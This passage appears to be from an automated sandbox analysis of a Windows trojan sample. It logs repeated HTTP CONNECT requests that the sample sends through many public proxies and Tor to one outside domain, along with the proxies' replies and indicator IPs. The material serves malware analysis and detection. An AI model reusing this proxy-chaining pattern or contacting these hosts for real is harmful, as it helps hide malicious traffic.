                                                                                Feb 23, 2024 14:28:31.694873095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.187870026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.195054054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.194977999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192250013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.141165018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.530864954 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1158192.168.2.853521167.71.5.8380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.117321014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.322382927 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1159192.168.2.8535058.213.128.9080805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.122458935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.416841030 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1160192.168.2.852754141.94.174.629355828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.122464895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1161192.168.2.850936222.124.193.11480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.122805119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.614623070 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1162192.168.2.853364184.170.248.541455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.124325991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1163192.168.2.85264124.249.199.441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.133744001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1164192.168.2.85351620.44.188.1731295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.133812904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.413197041 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1165192.168.2.853510103.174.236.8880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.140085936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.898130894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.046034098 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1166192.168.2.853297177.53.221.89441965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.162013054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1167192.168.2.853022125.227.225.15733895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.166790009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1168192.168.2.85354479.110.196.14580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.176733971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1169192.168.2.852818107.180.101.18593685828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.185065031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.195058107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382582903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.398509979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:55.491738081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:07.491595984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:19.514941931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1170192.168.2.852427117.160.250.13488995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.186584949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.047462940 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1171192.168.2.853541200.41.148.2120005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.195765972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1172192.168.2.85338167.201.33.10252835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.216392994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1173192.168.2.85354358.234.116.19781935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.217104912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1174192.168.2.85109642.112.209.6856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.217662096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1175192.168.2.853553104.244.75.78315345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.219403028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1176192.168.2.85330727.76.194.1310805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.242769957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1177192.168.2.852746122.3.255.11441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.242799044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1178192.168.2.853567172.67.181.197805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.249859095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.336958885 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1179192.168.2.85354581.70.253.15280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.323424101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1180192.168.2.853309103.231.78.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.361857891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1181192.168.2.853547171.248.219.10810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.362426043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1182192.168.2.85356045.11.95.16560495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.362436056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1183192.168.2.85116697.74.233.206302015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.365227938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382544041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1184192.168.2.853311137.184.182.145156855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.366321087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1185192.168.2.85357845.14.174.148805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.366322041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.453881025 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1186192.168.2.853327162.0.220.222647315828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.366705894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382497072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1187192.168.2.8535898.213.129.154435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.384535074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1188192.168.2.8535948.213.129.154435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.401344061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1189192.168.2.853318109.69.0.17956785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.401345968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1190192.168.2.853574188.166.17.1888815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.401495934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.569704056 CET310INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:31 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 150
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1191192.168.2.8536008.213.129.154435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.419720888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192192.168.2.8536028.213.129.154435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.422488928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1193192.168.2.85356665.1.244.23210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.441142082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.726448059 CET28INHTTP/1.1 502 Bad Gateway


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1194192.168.2.853558202.131.159.5856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.463958025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1195192.168.2.853569151.232.55.190805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:31.472940922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
